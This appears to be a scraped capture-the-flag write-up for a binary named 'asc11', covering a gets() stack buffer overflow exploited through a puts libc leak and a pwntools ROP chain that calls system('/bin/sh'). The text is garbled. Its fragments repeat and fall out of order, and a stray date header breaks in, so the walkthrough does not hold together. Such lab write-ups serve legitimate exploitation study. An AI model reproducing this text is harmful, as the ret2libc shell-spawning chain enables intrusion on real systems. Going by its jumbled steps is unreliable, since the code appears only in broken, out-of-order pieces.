file asc11 checksec asc11 Output (example):
./asc11 It prints "Input: " , waits for input, then exits. Open in Ghidra/IDA. The main function:
leak = u64(p.recvline().strip().ljust(8, b'\x00')) libc.address = leak - libc.symbols['puts'] log.success(f'Libc base: hex(libc.address)') rop2 = ROP(libc) rop2.system(next(libc.search(b'/bin/sh')))
void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable
gets → classic buffer overflow. No canary, PIE off → easy ret2win/ret2libc. Use gdb + pattern create (from pwntools or msf-pattern ):
Asc 11 //top\\ May 2026
file asc11 checksec asc11 Output (example):
./asc11 It prints "Input: " , waits for input, then exits. Open in Ghidra/IDA. The main function: asc 11
leak = u64(p.recvline().strip().ljust(8, b'\x00')) libc.address = leak - libc.symbols['puts'] log.success(f'Libc base: hex(libc.address)') rop2 = ROP(libc) rop2.system(next(libc.search(b'/bin/sh'))) file asc11 checksec asc11 Output (example):
void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable waits for input
gets → classic buffer overflow. No canary, PIE off → easy ret2win/ret2libc. Use gdb + pattern create (from pwntools or msf-pattern ):